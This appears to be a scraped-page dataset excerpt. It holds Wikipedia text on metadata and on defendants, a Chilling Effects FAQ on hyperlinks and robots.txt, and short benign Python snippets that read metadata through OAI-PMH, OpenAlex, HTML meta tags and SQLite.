Rights management metadata explains intellectual property rights, while preservation metadata contains information to preserve and save a resource. 8 Statistical data repositories have their own requirements for metadata in order to describe not only the source and quality of the data 6 but also what statistical processes were used to create the data, which is of particular importance to the statistical community in order to both validate and improve the process of statistical data production. 7 An additional type of metadata beginning to be more developed is accessibility metadata. Accessibility metadata is not a new concept to libraries; however, advances in universal design have raised its profile. 24 : 213 214 Projects like Cloud4All and GPII identified the lack of common terminologies and models to describe the needs and preferences of users and information that fits those needs as a major gap in providing universal access solutions. 24 : 210 211 Those types of information are accessibility metadata. 24 : 214 Schema.org has incorporated several accessibility properties based on IMS Global Access for All Information Model Data Element Specification. 24 : 214 The Wiki page WebSchemas Accessibility lists several properties and their values. While the efforts to describe and standardize the varied accessibility needs of information seekers are beginning to become more robust, their adoption into established metadata schemas has not been as developed. For example, while Dublin Core (DC)'s "audience" and MARC 21's "reading level" could be used to identify resources suitable for users with dyslexia and DC's "format" could be used to identify resources available in braille, audio, or large print formats, there is more work to be done. 24 : 214 Metadata (metacontent) or, more correctly, the vocabularies used to assemble metadata (metacontent) statements, is typically structured according to a standardized concept using a well-defined metadata scheme, including metadata standards and metadata models. Tools such as controlled vocabularies, taxonomies, thesauri, data dictionaries, and metadata registries can be used to apply further standardization to the metadata. Structural metadata commonality is also of paramount importance in data model development and in database design. Metadata (metacontent) syntax refers to the rules created to structure the fields or elements of metadata (metacontent). 25 A single metadata scheme may be expressed in a number of different markup or programming languages, each of which requires a different syntax. For example, Dublin Core may be expressed in plain text, HTML, XML, and RDF. 26 A common example of (guide) metacontent is the bibliographic classification, the subject, the Dewey Decimal class number. There is always an implied statement in any "classification" of some object. To classify an object as, for example, Dewey class number 514 (Topology) (i.e. books having the number 514 on their spine) the implied statement is: book subject heading 514 . This is a subject-predicate-object triple, or more importantly, a class-attribute-value triple. The first 2 elements of the triple (class, attribute) are pieces of some structural metadata having a defined semantic. The third element is a value, preferably from some controlled vocabulary, some reference (master) data. The combination of the metadata and master data elements results in a statement which is a metacontent statement i.e. "metacontent metadata master data". 
All of these elements can be thought of as "vocabulary". Both metadata and master data are vocabularies that can be assembled into metacontent statements. There are many sources of these vocabularies, both meta and master data: UML, EDIFACT, XSD, Dewey UDC LoC, SKOS, ISO 25964, Pantone, Linnaean Binomial Nomenclature, etc. Using controlled vocabularies for the components of metacontent statements, whether for indexing or finding, is endorsed by ISO 25964: "If both the indexer and the searcher are guided to choose the same term for the same concept, then relevant documents will be retrieved. 27 This is particularly relevant when considering search engines of the internet, such as Google. The process indexes pages and then matches text strings using its complex algorithm; there is no intelligence or "inferencing" occurring, just the illusion thereof. Metadata schemata can be hierarchical in nature where relationships exist between metadata elements and elements are nested so that parent-child relationships exist between the elements. An example of a hierarchical metadata schema is the IEEE LOM schema, in which metadata elements may belong to a parent metadata element. Metadata schemata can also be one-dimensional, or linear, where each element is completely discrete from other elements and classified according to one dimension only. An example of a linear metadata schema is the Dublin Core schema, which is one-dimensional. Metadata schemata are often 2 dimensional, or planar, where each element is completely discrete from other elements but classified according to 2 orthogonal dimensions. 28 The degree to which the data or metadata is structured is referred to as "granularity". "Granularity" refers to how much detail is provided. Metadata with a high granularity allows for deeper, more detailed, and more structured information and enables a greater level of technical manipulation. A lower level of granularity means that metadata can be created for considerably lower costs but will not provide as detailed information. The major impact of granularity is not only on creation and capture, but moreover on maintenance costs. As soon as the metadata structures become outdated, so too is the access to the referred data. Hence granularity must take into account the effort to create the metadata as well as the effort to maintain it. In all cases where the metadata schemata exceed the planar depiction, some type of hypermapping is required to enable display and view of metadata according to chosen aspect and to serve special views. Hypermapping frequently applies to layering of geographical and geological information overlays. 29 International standards apply to metadata. Much work is being accomplished in the national and international standards communities, especially ANSI (American National Standards Institute) and ISO (International Organization for Standardization) to reach a consensus on standardizing metadata and registries. The core metadata registry standard is ISO IEC 11179 Metadata Registries (MDR), the framework for the standard is described in ISO IEC 11179 1:2004. 30 A new edition of Part 1 is in its final stage for publication in 2015 or early 2016. It has been revised to align with the current edition of Part 3, ISO IEC 11179 3:2013 31 which extends the MDR to support the registration of Concept Systems. (see ISO IEC 11179). This standard specifies a schema for recording both the meaning and technical structure of the data for unambiguous usage by humans and computers. 
ISO IEC 11179 standard refers to metadata as information objects about data, or "data about data". In ISO IEC 11179 Part 3, the information objects are data about Data Elements, Value Domains, and other reusable semantic and representational information objects that describe the meaning and technical details of a data item. This standard also prescribes the details for a metadata registry, and for registering and administering the information objects within a Metadata Registry. ISO IEC 11179 Part 3 also has provisions for describing compound structures that are derivations of other data elements, for example through calculations, collections of one or more data elements, or other forms of derived data. While this standard describes itself originally as a "data element" registry, its purpose is to support describing and registering metadata content independently of any particular application, lending the descriptions to being discovered and reused by humans or computers in developing new applications, databases, or for analysis of data collected in accordance with the registered metadata content. This standard has become the general basis for other kinds of metadata registries, reusing and extending the registration and administration portion of the standard. The Geospatial community has a tradition of specialized geospatial metadata standards, particularly building on traditions of map- and image-libraries and catalogs. Formal metadata is usually essential for geospatial data, as common text-processing approaches are not applicable. The Dublin Core metadata terms are a set of vocabulary terms that can be used to describe resources for the purposes of discovery. The original set of 15 classic 32 metadata terms, known as the Dublin Core Metadata Element Set 33 are endorsed in the following standards documents: The W3C Data Catalog Vocabulary (DCAT) 37 is an RDF vocabulary that supplements Dublin Core with classes for Dataset, Data Service, Catalog, and Catalog Record. DCAT also uses elements from FOAF, PROV-O, and OWL-Time. DCAT provides an RDF model to support the typical structure of a catalog that contains records, each describing a dataset or service. Although not a standard, Microformat (also mentioned in the section metadata on the internet below) is a web-based approach to semantic markup which seeks to re-use existing HTML XHTML tags to convey metadata. Microformat follows XHTML and HTML standards but is not a standard in itself. One advocate of microformats, Tantek elik, characterized a problem with alternative approaches: Here's a new language we want you to learn, and now you need to output these additional files on your server. It's a hassle. (Microformats) lower the barrier to entry. 38 Metadata may be written into a digital photo file that will identify who owns it, copyright and contact information, what brand or model of camera created the file, along with exposure information (shutter speed, f-stop, etc.) and descriptive information, such as keywords about the photo, making the file or image searchable on a computer and or the Internet. Some metadata is created by the camera such as, color space, color channels, exposure time, and aperture (EXIF), while some is input by the photographer and or software after downloading to a computer. 
39 Most digital cameras write metadata about the model number, shutter speed, etc., and some enable you to edit it; 40 this functionality has been available on most Nikon DSLRs since the Nikon D3, on most new Canon cameras since the Canon EOS 7D, and on most Pentax DSLRs since the Pentax K 3. Metadata can be used to make organizing in post-production easier with the use of key-wording. Filters can be used to analyze a specific set of photographs and create selections on criteria like rating or capture time. On devices with geolocation capabilities like GPS (smartphones in particular), the location the photo was taken from may also be included. Photographic Metadata Standards are governed by organizations that develop the following standards. They include, but are not limited to: Information on the times, origins and destinations of phone calls, electronic messages, instant messages, and other modes of telecommunication, as opposed to message content, is another form of metadata. Bulk collection of this call detail record metadata by intelligence agencies has proven controversial after disclosures by Edward Snowden of the fact that certain Intelligence agencies such as the NSA had been (and perhaps still are) keeping online metadata on millions of internet users for up to a year, regardless of whether or not they ever were persons of interest to the agency. Metadata is particularly useful in video, where information about its contents (such as transcripts of conversations and text descriptions of its scenes) is not directly understandable by a computer, but where an efficient search of the content is desirable. This is particularly useful in video applications such as Automatic Number Plate Recognition and Vehicle Recognition Identification software, wherein license plate data is saved and used to create reports and alerts. 42 There are 2 sources in which video metadata is derived: (1) operational gathered metadata, that is information about the content produced, such as the type of equipment, software, date, and location; (2) human-authored metadata, to improve search engine visibility, discoverability, audience engagement, and providing advertising opportunities to video publishers. 43 Avid's MetaSync and Adobe's Bridge are examples of professional video editing software with access to metadata. 44 Geospatial metadata relates to Geographic Information Systems (GIS) files, maps, images, and other data that is location-based. Metadata is used in GIS to document the characteristics and attributes of geographic data, such as database files and data that is developed within a GIS. It includes details like who developed the data, when it was collected, how it was processed, and what formats it's available in, and then delivers the context for the data to be used effectively. 45 Metadata can be created either by automated information processing or by manual work. Elementary metadata captured by computers can include information about when an object was created, who created it, when it was last updated, file size, and file extension. In this context an object refers to any of the following: A metadata engine collects, stores and analyzes information about data and metadata in use within a domain. 46 Data virtualization emerged in the 2000s as the new software technology to complete the virtualization "stack" in the enterprise. Metadata is used in data virtualization servers which are enterprise infrastructure components, alongside database and application servers. 
Metadata in these servers is saved as persistent repository and describe business objects in various enterprise systems and applications. Structural metadata commonality is also important to support data virtualization. Standardization and harmonization work has brought advantages to industry efforts to build metadata systems in the statistical community. 47 48 Several metadata guidelines and standards such as the European Statistics Code of Practice 49 and ISO 17369:2013 (Statistical Data and Metadata Exchange or SDMX) 47 provide key principles for how businesses, government bodies, and other entities should manage statistical data and metadata. Entities such as Eurostat, 50 European System of Central Banks, 50 and the U.S. Environmental Protection Agency 51 have implemented these and other such standards and guidelines with the goal of improving "efficiency when managing statistical business processes". 50 Metadata has been used in various ways as a means of cataloging items in libraries in both digital and analog formats. Such data helps classify, aggregate, identify, and locate a particular book, DVD, magazine, or any object a library might hold in its collection. 52 Until the 1980s, many library catalogs used 3x5 inch cards in file drawers to display a book's title, author, subject matter, and an abbreviated alpha-numeric string (call number) which indicated the physical location of the book within the library's shelves. The Dewey Decimal System employed by libraries for the classification of library materials by subject is an early example of metadata usage. The early paper catalog had information regarding whichever item was described on said card: title, author, subject, and a number as to where to find said item. 53 Beginning in the 1980s and 1990s, many libraries replaced these paper file cards with computer databases. These computer databases make it much easier and faster for users to do keyword searches. Another form of older metadata collection is the use by the US Census Bureau of what is known as the "Long Form". The Long Form asks questions that are used to create demographic data to find patterns of distribution. 54 Libraries employ metadata in library catalogues, most commonly as part of an Integrated Library Management System. Metadata is obtained by cataloging resources such as books, periodicals, DVDs, web pages or digital images. This data is stored in the integrated library management system, ILMS, using the MARC metadata standard. The purpose is to direct patrons to the physical or electronic location of items or areas they seek as well as to provide a description of the item s in question. More recent and specialized instances of library metadata include the establishment of digital libraries including e-print repositories and digital image libraries. While often based on library principles, the focus on non-librarian use, especially in providing metadata, means they do not follow traditional or common cataloging approaches. Given the custom nature of included materials, metadata fields are often specially created e.g. taxonomic classification fields, location fields, keywords, or copyright statement. Standard file information such as file size and format are usually automatically included. 55 Library operation has for decades been a key topic in efforts toward international standardization. Standards for metadata in digital libraries include Dublin Core, METS, MODS, DDI, DOI, URN, PREMIS schema, EML, and OAI-PMH. 
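The OAI-PMH protocol listed among the digital-library standards above exposes metadata (typically Dublin Core) over plain HTTP, so it can be harvested with the requests/XML tooling already used in this notebook. The sketch below assumes a hypothetical repository endpoint; the endpoint URL is an assumption, while the verb/metadataPrefix parameters and the Dublin Core namespace are the ones the protocol documents.

import requests
import xml.etree.ElementTree as ET

BASE_URL = "https://example-repository.org/oai"   # hypothetical OAI-PMH endpoint
DC_NS = "{http://purl.org/dc/elements/1.1/}"      # Dublin Core element namespace

params = {"verb": "ListRecords", "metadataPrefix": "oai_dc"}
response = requests.get(BASE_URL, params=params, timeout=30)
root = ET.fromstring(response.content)

# Print every Dublin Core title found in the harvested records
for title in root.iter(DC_NS + "title"):
    print("Title:", title.text)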
Leading libraries in the world give hints on their metadata standards strategies. 56 57 The use and creation of metadata in library and information science also include scientific publications: Metadata for scientific publications is often created by journal publishers and citation databases such as PubMed and Web of Science. The data contained within manuscripts or accompanying them as supplementary material is less often subject to metadata creation, 58 59 though they may be submitted to e.g. biomedical databases after publication. The original authors and database curators then become responsible for metadata creation, with the assistance of automated processes. Comprehensive metadata for all experimental data is the foundation of the FAIR Guiding Principles, or the standards for ensuring research data are findable, accessible, interoperable, and reusable. 60 Such metadata can then be utilized, complemented, and made accessible in useful ways. OpenAlex is a free online index of over 200 million scientific documents that integrates and provides metadata such as sources, citations, author information, scientific fields, and research topics. Its API and open source website can be used for metascience, scientometrics, and novel tools that query this semantic web of papers. 61 62 63 Another project under development, Scholia, uses the metadata of scientific publications for various visualizations and aggregation features such as providing a simple user interface summarizing literature about a specific feature of the SARS-CoV 2 virus using Wikidata's "main subject" property. 64 In research labor, transparent metadata about authors' contributions to works have been proposed e.g. the role played in the production of the paper, the level of contribution and the responsibilities. 65 66 Moreover, various metadata about scientific outputs can be created or complemented for instance, scite.ai attempts to track and link citations of papers as 'Supporting', 'Mentioning' or 'Contrasting' the study. 67 Other examples include developments of alternative metrics 68 which, beyond providing help for assessment and findability, also aggregate many of the public discussions about a scientific paper on social media such as Reddit, citations on Wikipedia, and reports about the study in the news media 69 and a call for showing whether or not the original findings are confirmed or could get reproduced. 70 71 Metadata in a museum context is the information that trained cultural documentation specialists, such as archivists, librarians, museum registrars and curators, create to index, structure, describe, identify, or otherwise specify works of art, architecture, cultural objects and their images. 72 73 74 Descriptive metadata is most commonly used in museum contexts for object identification and resource recovery purposes. 73 Metadata is developed and applied within collecting institutions and museums in order to: Many museums and cultural heritage centers recognize that given the diversity of artworks and cultural objects, no single model or standard suffices to describe and catalog cultural works. 72 73 74 For example, a sculpted Indigenous artifact could be classified as an artwork, an archaeological artifact, or an Indigenous heritage item. 
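Returning to the publication-metadata services mentioned above, OpenAlex exposes its index through a simple JSON API that can be queried with requests. A minimal sketch follows; the "search" parameter and the "results", "display_name", and "publication_year" fields reflect the public API documentation at the time of writing and should be treated as assumptions to verify against docs.openalex.org.

import requests

resp = requests.get("https://api.openalex.org/works",
                    params={"search": "web scraping"}, timeout=30)
resp.raise_for_status()
for work in resp.json().get("results", [])[:5]:
    # Each work record carries bibliographic metadata such as title and year
    print(work.get("publication_year"), "-", work.get("display_name"))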
The early stages of standardization in archiving, description and cataloging within the museum community began in the late 1990s with the development of standards such as Categories for the Description of Works of Art (CDWA), Spectrum, CIDOC Conceptual Reference Model (CRM), Cataloging Cultural Objects (CCO) and the CDWA Lite XML schema. 73 These standards use HTML and XML markup languages for machine processing, publication and implementation. 73 The Anglo-American Cataloguing Rules (AACR), originally developed for characterizing books, have also been applied to cultural objects, works of art and architecture. 74 Standards, such as the CCO, are integrated within a Museum's Collections Management System (CMS), a database through which museums are able to manage their collections, acquisitions, loans and conservation. 74 Scholars and professionals in the field note that the "quickly evolving landscape of standards and technologies" creates challenges for cultural documentarians, specifically non-technically trained professionals. 75 page needed Most collecting institutions and museums use a relational database to categorize cultural works and their images. 74 Relational databases and metadata work to document and describe the complex relationships amongst cultural objects and multi-faceted works of art, as well as between objects and places, people, and artistic movements. 73 74 Relational database structures are also beneficial within collecting institutions and museums because they allow for archivists to make a clear distinction between cultural objects and their images; an unclear distinction could lead to confusing and inaccurate searches. 74 An object's materiality, function, and purpose, as well as the size (e.g., measurements, such as height, width, weight), storage requirements (e.g., climate-controlled environment), and focus of the museum and collection, influence the descriptive depth of the data attributed to the object by cultural documentarians. 74 The established institutional cataloging practices, goals, and expertise of cultural documentarians and database structure also influence the information ascribed to cultural objects and the ways in which cultural objects are categorized. 72 74 Additionally, museums often employ standardized commercial collection management software that prescribes and limits the ways in which archivists can describe artworks and cultural objects. 75 As well, collecting institutions and museums use Controlled Vocabularies to describe cultural objects and artworks in their collections. 73 74 Getty Vocabularies and the Library of Congress Controlled Vocabularies are reputable within the museum community and are recommended by CCO standards. 74 Museums are encouraged to use controlled vocabularies that are contextual and relevant to their collections and enhance the functionality of their digital information systems. 73 74 Controlled Vocabularies are beneficial within databases because they provide a high level of consistency, improving resource retrieval. 73 74 Metadata structures, including controlled vocabularies, reflect the ontologies of the systems from which they were created. Often the processes through which cultural objects are described and categorized through metadata in museums do not reflect the perspectives of the maker communities. 72 76 Metadata has been instrumental in the creation of digital information systems and archives within museums and has made it easier for museums to publish digital content online. 
This has enabled audiences who might not have had access to cultural objects due to geographic or economic barriers to have access to them. 73 In the 2000s, as more museums have adopted archival standards and created intricate databases, discussions about Linked Data between museum databases have come up in the museum, archival, and library science communities. 75 Collection Management Systems (CMS) and Digital Asset Management tools can be local or shared systems. 74 Digital Humanities scholars note many benefits of interoperability between museum databases and collections, while also acknowledging the difficulties of achieving such interoperability. 75 Problems involving metadata in litigation in the United States are becoming widespread. Courts have looked at various questions involving metadata, including the discoverability of metadata by parties. The Federal Rules of Civil Procedure have specific rules for discovery of electronically stored information, and subsequent case law applying those rules has elucidated the litigant's duty to produce metadata when litigating in federal court. 77 In October 2009, the Arizona Supreme Court ruled that metadata records are public record. 78 Document metadata have proven particularly important in legal environments in which litigation has requested metadata, which can include sensitive information detrimental to a certain party in court. Using metadata removal tools to "clean" or redact documents can mitigate the risks of unwittingly sending sensitive data. This process partially (see data remanence) protects law firms from potentially damaging leaks of sensitive data through electronic discovery. Opinion polls have shown that 45% of Americans are "not at all confident" in the ability of social media sites to ensure their personal data is secure and 40% say that social media sites should not be able to store any information on individuals. 76% of Americans say that they are not confident that the information advertising agencies collect on them is secure and 50% say that online advertising agencies should not be allowed to record any of their information at all. 79 In Australia, the need to strengthen national security has resulted in the introduction of a new metadata storage law. 80 This new law means that both security and policing agencies will be allowed to access up to 2 years of an individual's metadata, with the aim of making it easier to stop any terrorist attacks and serious crimes from happening. Legislative metadata has been the subject of some discussion in law.gov forums such as workshops held by the Legal Information Institute at the Cornell Law School on 22 and 23 March 2010. The documentation for these forums is titled, "Suggested metadata practices for legislation and regulations". 81 A handful of key points have been outlined by these discussions, section headings of which are listed as follows: Australian medical research pioneered the definition of metadata for applications in health care. That approach offers the first recognized attempt to adhere to international standards in medical sciences instead of defining a proprietary standard under the World Health Organization (WHO) umbrella. The medical community, however, has yet to embrace the need to follow metadata standards despite research supporting these standards.
82 Research studies in the fields of biomedicine and molecular biology frequently yield large quantities of data, including results of genome or meta-genome sequencing, proteomics data, and even notes or plans created during the course of research itself. 83 Each data type involves its own variety of metadata and the processes necessary to produce these metadata. General metadata standards, such as ISA-Tab, 84 allow researchers to create and exchange experimental metadata in consistent formats. Specific experimental approaches frequently have their own metadata standards and systems: metadata standards for mass spectrometry include mzML 85 and SPLASH, 86 while XML-based standards such as PDBML 87 and SRA XML 88 serve as standards for macromolecular structure and sequencing data, respectively. The products of biomedical research are generally realized as peer-reviewed manuscripts and these publications are yet another source of data (see Science). A data warehouse (DW) is a repository of an organization's electronically stored data. Data warehouses are designed to manage and store the data. Data warehouses differ from business intelligence (BI) systems because BI systems are designed to use data to create reports and analyze the information, to provide strategic guidance to management. 89 Metadata is an important tool in how data is stored in data warehouses. The purpose of a data warehouse is to house standardized, structured, consistent, integrated, correct, "cleaned" and timely data, extracted from various operational systems in an organization. The extracted data are integrated in the data warehouse environment to provide an enterprise-wide perspective. Data are structured in a way to serve the reporting and analytic requirements. The design of structural metadata commonality using a data modeling method such as entity-relationship model diagramming is important in any data warehouse development effort. They detail metadata on each piece of data in the data warehouse. An essential component of a data warehouse business intelligence system is the metadata and tools to manage and retrieve the metadata. Ralph Kimball 90 describes metadata as the DNA of the data warehouse as metadata defines the elements of the data warehouse and how they work together. Kimball et al. 91 refers to 3 main categories of metadata: Technical metadata, business metadata and process metadata. Technical metadata is primarily definitional, while business metadata and process metadata is primarily descriptive. The categories sometimes overlap. The HTML format used to define web pages allows for the inclusion of a variety of types of metadata, from basic descriptive text, dates and keywords to further advanced metadata schemes such as the Dublin Core, e-GMS, and AGLS 92 standards. Pages and files can also be geotagged with coordinates, categorized or tagged, including collaboratively such as with folksonomies. When media has identifiers set or when such can be generated, information such as file tags and descriptions can be pulled or scraped from the Internet for example about movies. 93 Various online databases are aggregated and provide metadata for various data. The collaboratively built Wikidata has identifiers not just for media but also abstract concepts, various objects, and other entities, that can be looked up by humans and machines to retrieve useful information and to link knowledge in other knowledge bases and databases. 64 Metadata may be included in the page's header or in a separate file. 
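The page-header metadata described above (description/keywords meta tags, Dublin Core style names, Open Graph properties) can be pulled with the requests and BeautifulSoup stack imported at the top of this notebook. A minimal sketch, assuming a placeholder URL:

import requests
from bs4 import BeautifulSoup

html = requests.get("https://example.com", timeout=30).text   # placeholder URL
soup = BeautifulSoup(html, "html5lib")

meta_info = {}
for tag in soup.find_all("meta"):
    # Meta tags identify themselves via either "name" (description, keywords,
    # DC.title, ...) or "property" (Open Graph style og:title, og:image, ...)
    key = tag.get("name") or tag.get("property")
    if key:
        meta_info[key] = tag.get("content", "")

print(meta_info)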
Microformats allow metadata to be added to on-page data in a way that regular web users do not see, but computers, web crawlers and search engines can readily access. Many search engines are cautious about using metadata in their ranking algorithms because of exploitation of metadata and the practice of search engine optimization, SEO, to improve rankings. See the Meta element article for further discussion. This cautious attitude may be justified as people, according to Doctorow, 94 are not executing care and diligence when creating their own metadata and that metadata is part of a competitive environment where the metadata is used to promote the metadata creators own purposes. Studies show that search engines respond to web pages with metadata implementations, 95 and Google has an announcement on its site showing the meta tags that its search engine understands. 96 Enterprise search startup Swiftype recognizes metadata as a relevance signal that webmasters can implement for their website-specific search engine, even releasing their own extension, known as Meta Tags 2. 97 In the broadcast industry, metadata is linked to audio and video broadcast media to: This metadata can be linked to the video media thanks to the video servers. Most major broadcast sporting events like FIFA World Cup or the Olympic Games use this metadata to distribute their video content to TV stations through keywords. It is often the host broadcaster 98 who is in charge of organizing metadata through its International Broadcast Centre and its video servers. This metadata is recorded with the images and entered by metadata operators (loggers) who associate in live metadata available in metadata grids through software (such as Multicam(LSM) or IPDirector used during the FIFA World Cup or Olympic Games). 99 100 Metadata that describes geographic objects in electronic storage or format (such as datasets, maps, features, or documents with a geospatial component) has a history dating back to at least 1994. This class of metadata is described more fully on the geospatial metadata article. Ecological and environmental metadata is intended to document the "who, what, when, where, why, and how" of data collection for a particular study. This typically means which organization or institution collected the data, what type of data, which date(s) the data was collected, the rationale for the data collection, and the methodology used for the data collection. Metadata should be generated in a format commonly used by the most relevant science community, such as Darwin Core, Ecological Metadata Language, 101 or Dublin Core. Metadata editing tools exist to facilitate metadata generation (e.g. Metavist, 102 Mercury, Morpho 103 ). Metadata should describe the provenance of the data (where they originated, as well as any transformations the data underwent) and how to give credit for (cite) the data products. When first released in 1982, Compact Discs only contained a Table Of Contents (TOC) with the number of tracks on the disc and their length in samples. 104 105 Fourteen years later in 1996, a revision of the CD Red Book standard added CD-Text to carry additional metadata. 106 But CD-Text was not widely adopted. Shortly thereafter, it became common for personal computers to retrieve metadata from external sources (e.g. CDDB, Gracenote) based on the TOC. Digital audio formats such as digital audio files superseded music formats such as cassette tapes and CDs in the 2000s. 
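Because the microformats discussed earlier in this excerpt reuse ordinary HTML class attributes, BeautifulSoup class selectors are enough to scrape them. The sketch below uses a toy h-card marked up with the published microformats2 class names (h-card, p-name, u-url); in practice the HTML would come from requests.get(...).text rather than a literal string.

from bs4 import BeautifulSoup

html = """
<div class="h-card">
  <span class="p-name">Ada Lovelace</span>
  <a class="u-url" href="https://example.org/ada">homepage</a>
</div>
"""
soup = BeautifulSoup(html, "html5lib")
for card in soup.select(".h-card"):
    name = card.select_one(".p-name")
    url = card.select_one(".u-url")
    print(name.get_text(strip=True), "->", url["href"] if url else None)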
Digital audio files could be labeled with more information than could be contained in just the file name. That descriptive information is called the audio tag or audio metadata in general. Computer programs specializing in adding or modifying this information are called tag editors. Metadata can be used to name, describe, catalog, and indicate ownership or copyright for a digital audio file, and its presence makes it much easier to locate a specific audio file within a group, typically through use of a search engine that accesses the metadata. As different digital audio formats were developed, attempts were made to standardize a specific location within the digital files where this information could be stored. As a result, almost all digital audio formats, including mp3, broadcast wav, and AIFF files, have similar standardized locations that can be populated with metadata. The metadata for compressed and uncompressed digital music is often encoded in the ID3 tag. Common editors such as TagLib support MP3, Ogg Vorbis, FLAC, MPC, Speex, WavPack TrueAudio, WAV, AIFF, MP4, and ASF file formats. With the availability of cloud applications, which include those to add metadata to content, metadata is increasingly available over the Internet. Metadata can be stored either internally, 107 in the same file or structure as the data (this is also called embedded metadata), or externally, in a separate file or field from the described data. A data repository typically stores the metadata detached from the data but can be designed to support embedded metadata approaches. Each option has advantages and disadvantages: Metadata can be stored in either human-readable or binary form. Storing metadata in a human-readable format such as XML can be useful because users can understand and edit it without specialized tools. 108 However, text-based formats are rarely optimized for storage capacity, communication time, or processing speed. A binary metadata format enables efficiency in all these respects, but requires special software to convert the binary information into human-readable content. Each relational database system has its own mechanisms for storing metadata. Examples of relational-database metadata include: In database terminology, this set of metadata is referred to as the catalog. The SQL standard specifies a uniform means to access the catalog, called the information schema, but not all databases implement it, even if they implement other aspects of the SQL standard. For an example of database-specific metadata access methods, see Oracle metadata. Programmatic access to metadata is possible using APIs such as JDBC, or SchemaCrawler. 109 One of the first satirical examinations of the concept of Metadata as we understand it today is American science fiction author Hal Draper's short story, "MS Fnd in a Lbry" (1961). Here, the knowledge of all Mankind is condensed into an object the size of a desk drawer, however, the magnitude of the metadata (e.g. catalog of catalogs of... , as well as indexes and histories) eventually leads to dire yet humorous consequences for the human race. The story prefigures the modern consequences of allowing metadata to become more important than the real data it is concerned with, and the risks inherent in that eventuality as a cautionary tale. |
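The relational-database catalog described above can be queried programmatically. A minimal sketch using Python's built-in sqlite3 follows; note that SQLite does not implement the SQL information schema, so its own catalog table sqlite_master and the PRAGMA table_info statement play that role here.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE scraped_pages (url TEXT, fetched_at TEXT, status INTEGER)")

# SQLite's catalog: every table, index, and view is described in sqlite_master
for (name,) in conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'"):
    print("Table:", name)
    # Column-level metadata: (cid, name, declared type, notnull, default, pk)
    for cid, col, col_type, notnull, default, pk in conn.execute(f"PRAGMA table_info({name})"):
        print("  column:", col, col_type)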
203 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Defendant | In court proceedings, a defendant is a person or object who is the party either accused of committing a crime in a criminal prosecution or against whom some type of civil relief is being sought in a civil case. Terminology varies from one jurisdiction to another. In Scots law, the terms "accused" or "panel" are used instead in criminal proceedings and "defender" in civil proceedings. 1 Another term in use is "respondent". In a criminal trial, a defendant is a person accused (charged) of committing an offense (a crime; an act defined as punishable under criminal law). The other party to a criminal trial is usually a public prosecutor, but in some jurisdictions, private prosecutions are allowed. Criminal defendants are often taken into custody by police and brought before a court under an arrest warrant. Criminal defendants are usually obliged to post bail before being released from custody. For serious cases, such as murder, bail may be refused. Defendants must be present at every stage of the proceedings against them. (There is an exception for very minor cases such as traffic offenses in jurisdictions which treat them as crimes.) If more than one person is accused, the people may be referred to as "co-defendants" or "co-conspirators" in British and common law courts. In some jurisdictions, vulnerable defendants may be able to get access to the services of a non-registered intermediary to assist with communication at court. 2 In a civil lawsuit, a defendant (or a respondent) is also the accused party, although not of an offense, but of a civil wrong (a tort or a breach of contract, for instance). The person who starts the civil action through filing a complaint is referred to as the plaintiff (also known as the claimant). Defendants in civil actions usually make their first court appearance voluntarily in response to a summons. Historically, civil defendants could be taken into custody under a writ of capias ad respondendum. Modern-day civil defendants are usually able to avoid most (if not all) court appearances if represented by a lawyer. Most often and familiarly, defendants are persons: either natural persons (actual human beings) or juridical persons (persona ficta) under the legal fiction of treating organizations as persons. But a defendant may be an object, in which case the object itself is the direct subject of the action. When a court has jurisdiction over an object, it is said to have jurisdiction in rem. An example of an in rem case is United States v. Forty Barrels and Twenty Kegs of Coca-Cola (1916), where the defendant was not the Coca-Cola Company itself, but rather "Forty Barrels and Twenty Kegs of Coca-Cola". In current United States legal practice, in rem suits are primarily asset forfeiture cases, based on drug laws, as in USA v. $124,700 (2006). Defendants can set up an account to pay for litigation costs and legal expenses. These legal defense funds can have large membership counts where members contribute to the fund. The fund can be public or private and is set up for individuals, organizations, or a particular purpose. These funds are often used by public officials, civil-rights organizations, and public-interest organizations. Historically, "defendant" was a legal term for a person prosecuted for misdemeanour. It was not applicable to a person prosecuted for felony. 3 |
204 | https://en.wikipedia.org/wiki/Web_scraping | https://web.archive.org/web/20020308222536/http://www.chillingeffects.org/linking/faq.cgi#QID460 | Q: What is a hyperlink? Q: If a hyperlink is just a location pointer, how can it be illegal? Q: What is an "inline" image? Q: What is the Robots Exclusion standard? Question: What is a hyperlink? Answer: Unless you typed the URL directly into your web browser, you probably followed a hyperlink to get to this page. A hyperlink is a location reference that the web browser interprets, often by underlining the text in blue, to "link" to another information resource when clicked. In HTML (HyperText Markup Language, the code used to write web pages), a hyperlink looks like this: <a href="http://chillingeffects.org/linking/">link</a> Question: If a hyperlink is just a location pointer, how can it be illegal? Answer: A few courts have now held that a hyperlink violates the law if it points to illegal material with the purpose of disseminating that illegal material: In the DeCSS case, Universal v. Reimerdes, the court barred 2600 Magazine from posting hyperlinks to DeCSS code because it found the magazine had linked for the purpose of disseminating a circumvention device. (See Anticircumvention (DMCA).) The court ruled that it could regulate the link because of its "function", even if the link was also speech. In another case, Intellectual Reserve v. Utah Lighthouse Ministry, a Utah court found that linking to unauthorized copies of a text might be a contributory infringement of the work's copyright. (The defendant in that case had previously posted unauthorized copies on its own site, then replaced the copies with hyperlinks to other sites.) Like anything else on a website, a hyperlink could also be problematic if it misrepresents something about the website. For example, if the link and surrounding text falsely stated that a website is affiliated with another site or sponsored by the linked company, it might be false advertising or defamation. Question: What is an "inline" image? Answer: An "inline" image refers to a graphic displayed in the context of a page. HTML (Hypertext Markup Language) permits web authors to "inline" both images from their own websites and images hosted on other servers. When people complain about inline images, they are most often complaining about web pages that include graphics from external sources. Question: What is the Robots Exclusion standard? Answer: Robots (or 'bots or webcrawlers) are automated web browsers that "crawl" the web to retrieve web pages, for example on behalf of search engines or price comparison sites. The Robots Exclusion standard is an informal convention many of these robots obey, by which webmasters can place a "robots.txt" file on the webserver to tell web robots to avoid some pages or entire sites.
